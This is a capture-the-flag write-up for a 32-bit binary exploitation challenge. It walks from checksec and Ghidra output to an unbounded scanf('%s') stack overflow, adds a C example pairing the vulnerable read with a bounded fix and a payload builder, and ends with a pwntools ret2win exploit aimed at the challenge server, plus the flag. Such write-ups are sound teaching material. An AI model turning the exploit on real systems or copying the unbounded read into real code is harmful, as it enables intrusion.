# Get The Sword

{% file src="<https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FMdzuWj6vBCzNt8y3KprJ%2Fget_sword?alt=media&token=fcffd4fc-70b2-4fa9-a05f-9db1b7dea364>" %}

## <mark style="color:red;">Challenge Description :</mark>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FMKMu3ikRRPRLBZfeqfCs%2Fimage.png?alt=media&#x26;token=fd843265-0511-470c-89d9-a2348c00030e" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Basic Binary Enumeration :</mark>

The binary is a 32-bit ELF and is not stripped, so the function names (including the win function) are still in the symbol table, and checksec reports every mitigation off: no RELRO, no stack canary, NX disabled and no PIE. For this challenge the two that matter are the missing canary, which lets an overflow reach the saved EIP unnoticed, and the missing PIE, which gives every function a fixed address we can return to.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FoyMu3btr4uIB9aioue5R%2Fimage.png?alt=media&#x26;token=37b8bd68-23a3-449f-b373-e3d4aedfa04c" alt=""><figcaption></figcaption></figure></div>

Let's open the binary in Ghidra to analyze it and find potential vulnerabilities.

Ghidra shows four functions: `main`, `printSword`, `intro` and `getSword`.

```c
undefined4 main(void)
{
  printSword();
  intro();
  return 0;
}

void printSword(void)

{
  puts("      />_________________________________");
  puts("[#####[]_________________________________>");
  puts("      \\>");
  fflush(stdout);
  return;
}

void intro(void)

{
  undefined local_20 [24];
  
  printf("What do you want ? ?: ");
  fflush(stdout);
  __isoc99_scanf("%s",local_20); // BOF vulnerability: no field width
  printf("You want, %s\n",local_20);
  return;
}

// win function
void getSword(void)

{
  system("cat flag.txt");
  fflush(stdout);
  return;
}
```

The function `intro` is vulnerable: `scanf("%s", local_20)` copies the whole whitespace-delimited token from stdin into a 24-byte stack buffer with no length check, so anything longer than the buffer overwrites the saved EBP and the return address. `getSword` is never called from `main`, so it is the win function we want to return into.

### <mark style="color:blue;">Offset to EIP :</mark>

We can find the offset with gdb (a cyclic pattern and a crash), or read it straight from Ghidra's stack frame.

Ghidra names stack variables by their offset below the return address, so `local_20` starts 0x20 = 32 bytes below the saved EIP: 24 bytes of buffer, 4 bytes of alignment padding and the 4-byte saved EBP. Writing 32 bytes of padding therefore puts the next 4 bytes on the return address.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FtcuxJDbNeuJDLanjlCg5%2Fimage.png?alt=media&#x26;token=b9876e12-7194-441a-a567-14712fff40b8" alt=""><figcaption></figcaption></figure></div>
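The two points above, the unbounded read in `intro` and the 32-byte distance from `local_20` to the saved EIP, as an added C example that is not the challenge source or the author's code. It places the decompiled `scanf("%s")` pattern next to a bounded replacement, builds the ret2win input for a 32-bit target, and checks the one limit this primitive has: `%s` stops at the first whitespace byte, so the overwrite cannot carry one. `BUF_SIZE` and `RET_OFFSET` come from the writeup; the win address `0x08049196` and the oversized input are constructed for the demo, not taken from the binary.

```c
/* Added example (not the challenge's or the author's code): the unbounded
 * scanf("%s") read from intro() next to a bounded replacement, plus a
 * builder for the ret2win payload. All inputs are constructed here. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   24   /* size of local_20 in intro() */
#define RET_OFFSET 32   /* local_20 sits 0x20 bytes below the saved EIP */

/* The decompiled pattern: no field width, so scanf copies the whole
 * whitespace-delimited token into a 24-byte stack buffer. Kept for
 * comparison only; it is never called with untrusted input in this file. */
void intro_vulnerable(void)
{
    char buf[BUF_SIZE];
    scanf("%s", buf);                 /* overflow: no bound */
    printf("You want, %s\n", buf);
}

/* Bounded replacement. The width is generated from the real buffer size
 * so "%23s" cannot drift from the declaration; one byte is reserved for
 * the terminating NUL. Reads from a string so the demo runs offline.
 * Returns the number of bytes stored, or -1 if no token was found. */
int read_word_bounded(const char *input, char *dst, size_t dst_size)
{
    char fmt[16];
    if (dst_size < 2)
        return -1;
    snprintf(fmt, sizeof fmt, "%%%zus", dst_size - 1);
    if (sscanf(input, fmt, dst) != 1) {
        dst[0] = '\0';
        return -1;
    }
    return (int)strlen(dst);
}

/* Build the ret2win input: RET_OFFSET bytes of padding followed by the
 * target address, little-endian as on 32-bit x86. Returns the payload
 * length, or 0 if the output buffer is too small. */
size_t build_payload(uint32_t target, uint8_t *out, size_t cap)
{
    if (cap < RET_OFFSET + 4)
        return 0;
    memset(out, 'A', RET_OFFSET);
    for (int i = 0; i < 4; i++)
        out[RET_OFFSET + i] = (uint8_t)(target >> (8 * i));
    return RET_OFFSET + 4;
}

/* scanf("%s") ends the token at the first whitespace byte, so a payload
 * containing one (0x09-0x0d, 0x20) is cut before reaching the return
 * address. Returns 1 if every byte survives the read, 0 otherwise. */
int payload_deliverable(const uint8_t *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (isspace(payload[i]))
            return 0;
    return 1;
}

int main(void)
{
    char dst[BUF_SIZE];
    uint8_t payload[RET_OFFSET + 4];
    /* Constructed 36-byte token, longer than the buffer. */
    const char *oversized = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    int n = read_word_bounded(oversized, dst, sizeof dst);
    printf("bounded read stored %d of %zu bytes\n", n, strlen(oversized));

    /* Hypothetical win-function address; take the real one from
     * elf.symbols.getSword or `readelf -s get_sword`. */
    size_t len = build_payload(0x08049196u, payload, sizeof payload);
    printf("payload %zu bytes, deliverable via %%s: %d\n",
           len, payload_deliverable(payload, len));
    return 0;
}
```

The whitespace check is the caveat worth remembering with a `scanf("%s")` primitive: an address such as `0x0804200a` contains a newline byte and cannot be delivered through it, whereas `gets`- or `read`-based overflows have no such restriction.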

### <mark style="color:blue;">Exploit :</mark>

```python
from pwn import *

# Set up pwntools for the correct architecture (i386, taken from the ELF header)
exe = './get_sword'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# io = process(exe)          # local test
io = remote('173.255.201.51', 31337)

offset = 32                  # bytes from local_20 to the saved EIP
# ret gadget (ropper --file=./get_sword --search="ret"); only needed for
# stack alignment on 64-bit targets, so it stays unused on this 32-bit binary
ret = 0x0804900e

# No PIE, so getSword has a fixed address in the symbol table
payload = flat(
    offset * b'A',
    elf.symbols.getSword
)

io.sendlineafter(b':', payload)   # answer the "What do you want ? ?: " prompt

io.interactive()
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FgPZcRz4sPYjkw1pghnN5%2Fimage.png?alt=media&#x26;token=d61e18b4-2a82-49de-b744-134404297b3b" alt=""><figcaption></figcaption></figure></div>

### <mark style="color:blue;">Flag :</mark>

```
KCTF{so_you_g0t_the_sw0rd}
```
